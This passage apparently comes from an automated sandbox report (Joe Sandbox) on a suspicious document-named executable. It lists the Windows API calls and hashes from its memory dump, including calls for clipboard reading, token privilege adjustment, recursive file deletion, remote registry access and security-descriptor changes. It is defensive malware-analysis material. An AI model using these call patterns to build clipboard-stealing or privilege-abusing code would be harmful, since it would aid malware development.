                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1867810238-1173974218
                                                        • Opcode ID: 71956f93a832ffe07928850dae264f285500b7b1d344ea7b1fb1b4ec317508a1
                                                        • Instruction ID: 98a95b0c70225ba8d53582dbd6958ecc412483322f45ad739b916f4f65a912ba
                                                        • Opcode Fuzzy Hash: 71956f93a832ffe07928850dae264f285500b7b1d344ea7b1fb1b4ec317508a1
                                                        • Instruction Fuzzy Hash: AD51407290025CAADF21EBA0DC89EEE777CAF05301F4445D6E949A3041DB79AB8DCF61
                                                        APIs
                                                        • OpenClipboard.USER32(007ADBF0), ref: 007670C3
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007670D1
                                                        • GetClipboardData.USER32(0000000D), ref: 007670D9
                                                        • CloseClipboard.USER32 ref: 007670E5
                                                        • GlobalLock.KERNEL32(00000000), ref: 00767101
                                                        • CloseClipboard.USER32 ref: 0076710B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00767120
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0076712D
                                                        • GetClipboardData.USER32(00000001), ref: 00767135
                                                        • GlobalLock.KERNEL32(00000000), ref: 00767142
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00767176
                                                        • CloseClipboard.USER32 ref: 00767283
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: a90ab89771dbf5b1c42b125366f173c33a058edc03774de466e936850b1a8783
                                                        • Instruction ID: fc829801998455d55b541ce510bf75d34f8163d3c3b69d733b354408e8aeee5e
                                                        • Opcode Fuzzy Hash: a90ab89771dbf5b1c42b125366f173c33a058edc03774de466e936850b1a8783
                                                        • Instruction Fuzzy Hash: 5851D031208205AFD329EF64DC9AF6E77A8BB84B41F00851AF946D61E1DF68DC45CA62
                                                        APIs
                                                          • Part of subcall function 0074BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0074BF0F
                                                          • Part of subcall function 0074BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0074BF3C
                                                          • Part of subcall function 0074BEC3: GetLastError.KERNEL32 ref: 0074BF49
                                                        • _memset.LIBCMT ref: 0074BA34
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0074BA86
                                                        • CloseHandle.KERNEL32(?), ref: 0074BA97
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0074BAAE
                                                        • GetProcessWindowStation.USER32 ref: 0074BAC7
                                                        • SetProcessWindowStation.USER32(00000000), ref: 0074BAD1
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0074BAEB
                                                          • Part of subcall function 0074B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0074B9EC), ref: 0074B8C5
                                                          • Part of subcall function 0074B8B0: CloseHandle.KERNEL32(?,?,0074B9EC), ref: 0074B8D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: dfc7c9aa12fb146af07d6f8d6c3b3891d3e680d3cbfec6fb60e143027479b7e5
                                                        • Instruction ID: 000ee43e8d28c50d203e66cdc8763098e0cc1d2926e7f95251e5cf1915efba40
                                                        • Opcode Fuzzy Hash: dfc7c9aa12fb146af07d6f8d6c3b3891d3e680d3cbfec6fb60e143027479b7e5
                                                        • Instruction Fuzzy Hash: 90816971900209EFDF119FE4DD89AEEBBB9EF08304F14851AF914A6161DB39CE15DB60
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00762065
                                                        • _wcscmp.LIBCMT ref: 0076207A
                                                        • _wcscmp.LIBCMT ref: 00762091
                                                        • GetFileAttributesW.KERNEL32(?), ref: 007620A3
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007620BD
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007620D5
                                                        • FindClose.KERNEL32(00000000), ref: 007620E0
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007620FC
                                                        • _wcscmp.LIBCMT ref: 00762123
                                                        • _wcscmp.LIBCMT ref: 0076213A
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076214C
                                                        • SetCurrentDirectoryW.KERNEL32(007C3A68), ref: 0076216A
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00762174
                                                        • FindClose.KERNEL32(00000000), ref: 00762181
                                                        • FindClose.KERNEL32(00000000), ref: 00762191
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 440cf413b19aaeff9b3bfbd795d419e05ce83527f52636366ff3c9ca97d6dc97
                                                        • Instruction ID: 5eb423d7c31e78e08d22e9c1b5d64085346516c57e3f7eb9963135843dc7befa
                                                        • Opcode Fuzzy Hash: 440cf413b19aaeff9b3bfbd795d419e05ce83527f52636366ff3c9ca97d6dc97
                                                        • Instruction Fuzzy Hash: 7031B57260461DBADB24DBA4DC49EDE73ACAF06310F108156FD12E3092DB7CDE46CA65
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0077F14B
                                                          • Part of subcall function 0077D5EE: ClientToScreen.USER32(?,?), ref: 0077D617
                                                          • Part of subcall function 0077D5EE: GetWindowRect.USER32(?,?), ref: 0077D68D
                                                          • Part of subcall function 0077D5EE: PtInRect.USER32(?,?,0077EB2C), ref: 0077D69D
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0077F1B4
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0077F1BF
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0077F1E2
                                                        • _wcscat.LIBCMT ref: 0077F212
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0077F229
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0077F242
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0077F259
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0077F27B
                                                        • DragFinish.SHELL32(?), ref: 0077F282
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0077F36D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 2166380349-3440237614
                                                        • Opcode ID: f18fd6204e8aa6945999f04da0acf71cc850ce91843896c7ecab3677d8b449b1
                                                        • Instruction ID: c4d937c1e92eaadf88a9ec21de7d07e2183da882d8696df1be06a72f643a1850
                                                        • Opcode Fuzzy Hash: f18fd6204e8aa6945999f04da0acf71cc850ce91843896c7ecab3677d8b449b1
                                                        • Instruction Fuzzy Hash: 64613971108300EFC711EF64DC89E9BBBF8BF89750F408A1EF595921A1DB789A45CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007621C0
                                                        • _wcscmp.LIBCMT ref: 007621D5
                                                        • _wcscmp.LIBCMT ref: 007621EC
                                                          • Part of subcall function 00757606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00757621
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0076221B
                                                        • FindClose.KERNEL32(00000000), ref: 00762226
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00762242
                                                        • _wcscmp.LIBCMT ref: 00762269
                                                        • _wcscmp.LIBCMT ref: 00762280
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00762292
                                                        • SetCurrentDirectoryW.KERNEL32(007C3A68), ref: 007622B0
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007622BA
                                                        • FindClose.KERNEL32(00000000), ref: 007622C7
                                                        • FindClose.KERNEL32(00000000), ref: 007622D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 7f8830dde0152dc17e3c44c2e995a98037a653f48a255a6c684734c5c8a65a6f
                                                        • Instruction ID: 8bdc85c3927265ae0e0f43ebbef10e9fc4bac2a31543a3cdbf83fe6b52369b42
                                                        • Opcode Fuzzy Hash: 7f8830dde0152dc17e3c44c2e995a98037a653f48a255a6c684734c5c8a65a6f
                                                        • Instruction Fuzzy Hash: FE310572600619AECB64DBA4DC58EDE33ACBF05321F118155FD12A30A2D7389E86CA68
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove_memset
                                                        • String ID: Q\E$[$\$\$\$]$^
                                                        • API String ID: 3555123492-286096704
                                                        • Opcode ID: afdcbe519479369170775a9c82c00752272ce30187b32115d559297e5b367768
                                                        • Instruction ID: b0771a206a8f770661ed2d36dc21e472d323564998f846e2f0c4bcbf2e08cfcd
                                                        • Opcode Fuzzy Hash: afdcbe519479369170775a9c82c00752272ce30187b32115d559297e5b367768
                                                        • Instruction Fuzzy Hash: DC727C71E14219DFDF28CF98D8906EDB7B1FF44314F2481A9D855AB281E738AE81DB90
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0077ED0C
                                                        • GetFocus.USER32 ref: 0077ED1C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0077ED27
                                                        • _memset.LIBCMT ref: 0077EE52
                                                        • GetMenuItemInfoW.USER32 ref: 0077EE7D
                                                        • GetMenuItemCount.USER32(00000000), ref: 0077EE9D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0077EEB0
                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0077EEE4
                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0077EF2C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0077EF64
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0077EF99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 3616455698-4108050209
                                                        • Opcode ID: d16d430ca09ae5e0ae1a48701c89f3001a73ee3700d0ff41cbc58b806ae236b3
                                                        • Instruction ID: e6df7343802064f6f417c250af9285e9133eec916c24142efd60863fbc850130
                                                        • Opcode Fuzzy Hash: d16d430ca09ae5e0ae1a48701c89f3001a73ee3700d0ff41cbc58b806ae236b3
                                                        • Instruction Fuzzy Hash: 0F817071208301AFDB60DF14D884A6BBBE4FF88394F00896EF99997291D778DD45CB92
                                                        APIs
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                          • Part of subcall function 0074B8E7: GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                          • Part of subcall function 0074B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
                                                          • Part of subcall function 0074B8E7: RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                          • Part of subcall function 0074B982: GetProcessHeap.KERNEL32(00000008,0074B3E1,00000000,00000000,?,0074B3E1,?), ref: 0074B98E
                                                          • Part of subcall function 0074B982: RtlAllocateHeap.NTDLL(00000000,?,0074B3E1), ref: 0074B995
                                                          • Part of subcall function 0074B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0074B3E1,?), ref: 0074B9A6
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0074B3FC
                                                        • _memset.LIBCMT ref: 0074B411
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0074B430
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B441
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0074B47E
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0074B49A
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B4B7
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0074B4C6
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0074B4CD
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0074B4EE
                                                        • CopySid.ADVAPI32(00000000), ref: 0074B4F5
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0074B526
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0074B54C
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0074B560
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 2347767575-0
                                                        • Opcode ID: 19f5074b57e0a591fbd20fc466cb27d31936ea501f3ba1eeac8c247f13591434
                                                        • Instruction ID: ead4cf6c264937f981d6c1de9529362c8f681e0f3d9f0f25f0f9071acd922792
                                                        • Opcode Fuzzy Hash: 19f5074b57e0a591fbd20fc466cb27d31936ea501f3ba1eeac8c247f13591434
                                                        • Instruction Fuzzy Hash: C9511A71900209EBDF14DFA5DC85AEEBB79FF08300F14812AE915A7291DB39DE15CB64
                                                        APIs
                                                        • __lock.LIBCMT ref: 00742C5E
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • ____lc_codepage_func.LIBCMT ref: 00742CA5
                                                        • __getenv_helper_nolock.LIBCMT ref: 00742CC6
                                                        • _free.LIBCMT ref: 00742CF9
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _strlen.LIBCMT ref: 00742D00
                                                        • __malloc_crt.LIBCMT ref: 00742D07
                                                        • _strlen.LIBCMT ref: 00742D25
                                                        • __invoke_watson.LIBCMT ref: 00742D48
                                                        • _free.LIBCMT ref: 00742D57
                                                        • GetTimeZoneInformation.KERNEL32(007D0A58,00000000,00000000,00000000,00000000,00000000,007C6B10,00000030,007429F1,007C6AF0,00000008,00735D07), ref: 00742D68
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,007D0A5C,000000FF,?,0000003F,00000000,?), ref: 00742DE4
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,007D0AB0,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00742E1D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2302051780-0
                                                        • Opcode ID: 8a0f8fe68dc9b351f48e524b7b32c57392b01dd9895ff2d8654c69414e1d6f25
                                                        • Instruction ID: f3515918e9faa155ea0680d7e5e8dbcde043488e4864e40c6008142383f37b6c
                                                        • Opcode Fuzzy Hash: 8a0f8fe68dc9b351f48e524b7b32c57392b01dd9895ff2d8654c69414e1d6f25
                                                        • Instruction Fuzzy Hash: 29A1DF71E04215DEDB159F68D889BADBBB8FF49310F94505AF010AB2A2DB3C8C53CB64
                                                        APIs
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00757C0C: GetFileAttributesW.KERNEL32(?,00756A7B), ref: 00757C0D
                                                        • _wcscat.LIBCMT ref: 00756E7E
                                                        • __wsplitpath.LIBCMT ref: 00756E99
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00756EAE
                                                        • _wcscpy.LIBCMT ref: 00756EDD
                                                        • _wcscat.LIBCMT ref: 00756EEF
                                                        • _wcscat.LIBCMT ref: 00756F01
                                                        • DeleteFileW.KERNEL32(?), ref: 00756F0E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00756F22
                                                        • FindClose.KERNEL32(00000000), ref: 00756F3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                        • String ID: \*.*
                                                        • API String ID: 2643075503-1173974218
                                                        • Opcode ID: d989c964675aa4ade74e7f7366eac30eecd6ba9af020dfff8b8226af2fac5d7f
                                                        • Instruction ID: 0133859213cbbf894327564b92e69d77bdd0ed8ece696b8c599140a35cd3ff7f
                                                        • Opcode Fuzzy Hash: d989c964675aa4ade74e7f7366eac30eecd6ba9af020dfff8b8226af2fac5d7f
                                                        • Instruction Fuzzy Hash: 2A21C572409348AEC310EBA4D8899DF7BDCAF59314F444A1AF9D4C3042EA38E64D87A2
                                                        APIs
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077317F
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077321E
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007732B6
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007734F5
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00773502
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 0725e8edb1f79baf08639f3dcd95718eb67b5288041e6d040346f3fa99444a30
                                                        • Instruction ID: f9914c605f5977d921329fa9aa831f0faa4a7aad39081a89c68c03d5ad9e1cb4
                                                        • Opcode Fuzzy Hash: 0725e8edb1f79baf08639f3dcd95718eb67b5288041e6d040346f3fa99444a30
                                                        • Instruction Fuzzy Hash: 8CE16B71204200EFCB15DF28C895D6ABBE8EF88750B04C56DF94ADB2A1DB38ED45DB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: aa2bec3c96c11fca4901d2508f48fc3cd5aef7505f828d1ff0a8d579031a2e8e
                                                        • Instruction ID: fb44c78aacdef2117a2752c24188ddcd9aed15ea4c2d9aaacac7298031f7ee8f
                                                        • Opcode Fuzzy Hash: aa2bec3c96c11fca4901d2508f48fc3cd5aef7505f828d1ff0a8d579031a2e8e
                                                        • Instruction Fuzzy Hash: 61216D31204210AFDB24AF65DC59B6D7BA8EF44755F00C01AFD0A9B261DB7CED42CB98
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007624F6
                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00762526
                                                        • _wcscmp.LIBCMT ref: 0076253A
                                                        • _wcscmp.LIBCMT ref: 00762555
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007625F3
                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00762609
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 13e60e4db8c3c275da065ad6fbe6c1fd7f888d2e04d6152b2c01ea9f0794cb6b
                                                        • Instruction ID: 26972c2691c2747e09b8ea05dac76097ece25b3b9f507d2a0cff06d5a2c327af
                                                        • Opcode Fuzzy Hash: 13e60e4db8c3c275da065ad6fbe6c1fd7f888d2e04d6152b2c01ea9f0794cb6b
